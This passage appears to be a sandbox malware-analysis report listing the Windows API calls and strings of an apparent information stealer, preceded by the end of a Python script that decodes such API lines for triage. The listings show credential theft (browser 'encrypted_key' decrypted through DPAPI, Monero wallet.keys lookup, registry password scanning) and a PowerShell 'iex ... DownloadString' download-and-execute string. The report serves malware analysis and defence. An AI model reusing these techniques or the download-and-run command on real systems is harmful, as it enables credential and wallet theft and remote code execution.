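    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
_HEX = re.compile(r"^-?[0-9A-F]{8}$")
Arg = Union[int, str, None]          # int = hex value, str = recovered literal, None = "?"

@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]
    ref: int                         # address of the call site
    parent: Optional[int] = None     # set for "Part of subcall function" lines
    decoded: dict = field(default_factory=dict)

# Win32 SDK constants. Enumerations map value -> name; flag tables are (mask, name)
# with composite masks first, so 0x20019 is reported as KEY_READ rather than five bits.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = [(0x20019, "KEY_READ"), (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"),
              (0x4, "KEY_CREATE_SUB_KEY"), (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"),
              (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
INET = [(0x80000000, "INTERNET_FLAG_RELOAD"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
        (0x00800000, "INTERNET_FLAG_SECURE"), (0x00400000, "INTERNET_FLAG_KEEP_CONNECTION"),
        (0x00200000, "INTERNET_FLAG_NO_AUTO_REDIRECT"), (0x00080000, "INTERNET_FLAG_NO_COOKIES"),
        (0x00000200, "INTERNET_FLAG_NO_UI"), (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE")]
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x23: "CSIDL_COMMON_APPDATA", 0x26: "CSIDL_PROGRAM_FILES", 0x28: "CSIDL_PROFILE"}
LMEM = [(0x42, "LHND"), (0x40, "LPTR"), (0x2, "LMEM_MOVEABLE")]

def flags(value: int, table) -> str:
    """Name the bits of value; leftover bits not in the table are shown in hex."""
    names, rest = [], value
    for mask, name in table:
        if (rest & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"

def _arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None                  # the plugin could not recover this argument
    return int(tok, 16) if _HEX.match(tok) else tok

def _decode(call: Call) -> None:
    def at(i: int) -> Optional[int]:
        return call.args[i] if i < len(call.args) and isinstance(call.args[i], int) else None
    d, api = call.decoded, call.api
    if api in ("RegOpenKeyExA", "RegOpenKeyExW"):
        if at(0) in HKEY: d["hKey"] = HKEY[at(0)]
        if at(3) is not None: d["samDesired"] = flags(at(3), KEY_RIGHTS)
    elif api in ("CreateFileA", "CreateFileW"):
        if at(1) is not None: d["dwDesiredAccess"] = flags(at(1), GENERIC)
        if at(2) is not None: d["dwShareMode"] = flags(at(2), SHARE)
        if at(4) in DISPOSITION: d["dwCreationDisposition"] = DISPOSITION[at(4)]
    elif api in ("InternetOpenUrlA", "InternetOpenUrlW"):
        if at(4) is not None: d["dwFlags"] = flags(at(4), INET)
    elif api in ("SHGetFolderPathA", "SHGetFolderPathW"):
        if at(1) in CSIDL: d["csidl"] = CSIDL[at(1)]
    elif api == "LocalAlloc":
        if at(0) is not None: d["uFlags"] = flags(at(0), LMEM)

def parse_api_line(line: str) -> Optional[Call]:
    """Return a Call for an API line, or None for headers and other text."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Arguments are split on commas; a recovered literal containing a comma would split too.
    args = [_arg(t) for t in raw.split(",")] if raw else []
    call = Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16),
                int(m.group("parent"), 16) if m.group("parent") else None)
    _decode(call)
    return call

def annotate(listing: str) -> List[Call]:
    return [c for c in map(parse_api_line, listing.splitlines()) if c is not None]

def render(call: Call) -> str:
    """One triage line per call: site address, API, caller, decoded arguments."""
    tag = f" (in sub_{call.parent:08X})" if call.parent is not None else ""
    notes = " ".join(f"{k}={v}" for k, v in call.decoded.items())
    return f"{call.ref:08X} {call.api}{tag} {notes}".rstrip()

if __name__ == "__main__":
    for c in annotate(SAMPLE):
        print(render(c))
```

                               Feed it the lines of any "APIs" block; headers such as "Strings" or "Memory Dump Source" do not match and are skipped. The decoded output makes the behaviour readable at a glance: the HKCU key is opened KEY_READ and its values are scanned for "Password", the HKLM version key is opened with KEY_WOW64_64KEY so a 32-bit process reads the native view, the download uses INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE so nothing lands in the WinINet cache, and the target directory is built under CSIDL_LOCAL_APPDATA.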
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                              • Instruction ID: 629248a6fa37975576a41ee3cefeb05bd4120b76f05b2f5e3e9a103db64f90c4
                              • Opcode Fuzzy Hash: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                              • Instruction Fuzzy Hash: 15313EB4A00209EFDB24DFA5D995BAEB7B5FF48340F108168E905A7284D779A941CFB0
                              APIs
                              • lstrcat.KERNEL32(?,0197ED10), ref: 00DF47DB
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4801
                              • lstrcat.KERNEL32(?,?), ref: 00DF4820
                              • lstrcat.KERNEL32(?,?), ref: 00DF4834
                              • lstrcat.KERNEL32(?,0196B000), ref: 00DF4847
                              • lstrcat.KERNEL32(?,?), ref: 00DF485B
                              • lstrcat.KERNEL32(?,0197D230), ref: 00DF486F
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                                • Part of subcall function 00DF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                                • Part of subcall function 00DF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                                • Part of subcall function 00DF4570: wsprintfA.USER32 ref: 00DF45A6
                                • Part of subcall function 00DF4570: FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                              • Instruction ID: a8196d71f20cacd9a972eb84cf7e8b15ab931e3127ee56da502ef8dd83bfeb9b
                              • Opcode Fuzzy Hash: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                              • Instruction Fuzzy Hash: 3E3152B6A0021C97CB20FBA0DC85EFD7378AB58704F408589F35996085EEB5D7898FB5
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF2D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00DF2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00DF2D04
                              • <, xrefs: 00DF2D39
                              • ')", xrefs: 00DF2CB3
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                              • Instruction ID: 601b1ab582eda737c4b1be2f94d404c453d58ce39ac5b4f53f90c65153a3ea3e
                              • Opcode Fuzzy Hash: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                              • Instruction Fuzzy Hash: B141DAB180021C9ADB14EBA4C892BFDB774EF10340F55C029E60AB7195DFB46A4ACFB1
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9F41
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 06e18571977496fba1432e3c1d047a50b53f03c9cd78a9adb171f9f942ce08e4
                              • Instruction ID: e11c24ea36fee546ef39e163cc4964732f97237a11c051915169fcf032e54f14
                              • Opcode Fuzzy Hash: 06e18571977496fba1432e3c1d047a50b53f03c9cd78a9adb171f9f942ce08e4
                              • Instruction Fuzzy Hash: FA611C71A00248DBDB24EFA9CC96FED7775EF44340F048118FA0A6B195EB74AA45CB71
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0197D190,00000000,00020119,?), ref: 00DF40F4
                              • RegQueryValueExA.ADVAPI32(?,0197ECE0,00000000,00000000,00000000,000000FF), ref: 00DF4118
                              • RegCloseKey.ADVAPI32(?), ref: 00DF4122
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4147
                              • lstrcat.KERNEL32(?,0197ECC8), ref: 00DF415B
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                              • Instruction ID: 802eb676c489b45dc280f04f48f239d8374b20b1c917d61607c1c4ab0f3727f6
                              • Opcode Fuzzy Hash: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                              • Instruction Fuzzy Hash: 264146B6A00108ABDB34EFA0DC46FFE737DAB88300F508558B75557185EE759B888BB1
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00DF696C
                              • sscanf.NTDLL ref: 00DF6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69C0
                              • ExitProcess.KERNEL32 ref: 00DF69DA
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                              • Instruction ID: e94acc2b30b8bcef802bbdfbf79679f3e65cb68ea248a28e15d8aba097dd8286
                              • Opcode Fuzzy Hash: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                              • Instruction Fuzzy Hash: 2F21EAB5D0020CABCF14EFE8D945AEEB7B5FF48300F14852AE506E3644EB759605CB69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0196B708,00000000,00020119,?), ref: 00DF7E5E
                              • RegQueryValueExA.ADVAPI32(?,0197D250,00000000,00000000,000000FF,000000FF), ref: 00DF7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00DF7E92
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                              • Instruction ID: 8cfc7337b9b1ccb971056ab8c4b1b9f00ede266f596c0c127521baf1a729f79a
                              • Opcode Fuzzy Hash: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                              • Instruction Fuzzy Hash: 8C118FB1A44209EBD724CF94DD4AFBBBBB8FB44710F20811AF755A7684DB7958008BA0
                              APIs
                              • StrStrA.SHLWAPI(0197EA58,?,?,?,00DF140C,?,0197EA58,00000000), ref: 00DF926C
                              • lstrcpyn.KERNEL32(0102AB88,0197EA58,0197EA58,?,00DF140C,?,0197EA58), ref: 00DF9290
                              • lstrlen.KERNEL32(?,?,00DF140C,?,0197EA58), ref: 00DF92A7
                              • wsprintfA.USER32 ref: 00DF92C7
                              Strings
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                              • Instruction ID: 40c51b99f1894864d777b22474b0526c01cf0531ced158a6fb179e6848f95870
                              • Opcode Fuzzy Hash: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                              • Instruction Fuzzy Hash: F0011E75600108FFCB14DFECC998EAE7BB9FB48350F108548F9499B605CA35AA40DBA4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                              • Instruction ID: c31e0a8df0abaa9e233cad42ab802e30a7175c24ac536780b93c80fe4df52ac5
                              • Opcode Fuzzy Hash: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                              • Instruction Fuzzy Hash: AD011DB9B40208FBDB24DFE0DC49FAEB7B8FB48701F108159FA4597284DA759A018B60
                              APIs
                              Strings
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00DF6663
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF6726
                              • ExitProcess.KERNEL32 ref: 00DF6755
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E28,00000000,?), ref: 00DF882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8836
                              • wsprintfA.USER32 ref: 00DF8850
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00DF951E,00000000), ref: 00DF8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8D62
                              • wsprintfW.USER32 ref: 00DF8D78
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DEA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00DEA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00DEA6BC
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00DEA743
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED481
                              • lstrlen.KERNEL32(00000000), ref: 00DED698
                              • lstrlen.KERNEL32(00000000), ref: 00DED6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00DED72B
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED801
                              • lstrlen.KERNEL32(00000000), ref: 00DED99F
                              • lstrlen.KERNEL32(00000000), ref: 00DED9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00DEDA32
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                                • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                                • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                                • Part of subcall function 00DE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                                • Part of subcall function 00DE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                                • Part of subcall function 00DE9B60: LocalFree.KERNEL32(?), ref: 00DE9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: dfc55b8444cbade0b342bb67dcfed37afe17acec7f8ce036d4abc9e7a358bf2a
                              • Instruction ID: 074205fd76fc3d7fb26244f5a3406469f84e7de7be4644da5180eff1dca8888d
                              • Opcode Fuzzy Hash: dfc55b8444cbade0b342bb67dcfed37afe17acec7f8ce036d4abc9e7a358bf2a
                              • Instruction Fuzzy Hash: E4315EB6D01219ABCF14EBE5DC95AEEB7B8EF48300F144518EA05A7241EB349A04CBB1
                              APIs
                              • CreateFileA.KERNEL32(00DF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00DF3AEE,?), ref: 00DF92FC
                              • GetFileSizeEx.KERNEL32(000000FF,00DF3AEE), ref: 00DF9319
                              • CloseHandle.KERNEL32(000000FF), ref: 00DF9327
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                              • Instruction ID: 6d957af6572b69ffdae4ffa927f33fcce5df715b20d072493b2048bbf28636ad
                              • Opcode Fuzzy Hash: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                              • Instruction Fuzzy Hash: A2F06934F00208FBDB20DEA4DC18FAEB7F9AB48310F21C254EA91A72C4DA7596008B50
                              APIs
                              • __getptd.LIBCMT ref: 00DFC74E
                                • Part of subcall function 00DFBF9F: __amsg_exit.LIBCMT ref: 00DFBFAF
                              • __getptd.LIBCMT ref: 00DFC765
                              • __amsg_exit.LIBCMT ref: 00DFC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00DFC797
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                              • Instruction ID: 7fff97b43733d334436f56b55935f516305b2def4e0f9bd117f504ff066576ac
                              • Opcode Fuzzy Hash: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                              • Instruction Fuzzy Hash: 98F0907291430C9BD720BBB89D06B7A33A0EF00735F2BD14AF744AA1D2DB645990DE76
                              APIs
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4F7A
                              • lstrcat.KERNEL32(?,00E01070), ref: 00DF4F97
                              • lstrcat.KERNEL32(?,019786C0), ref: 00DF4FAB
                              • lstrcat.KERNEL32(?,00E01074), ref: 00DF4FBD
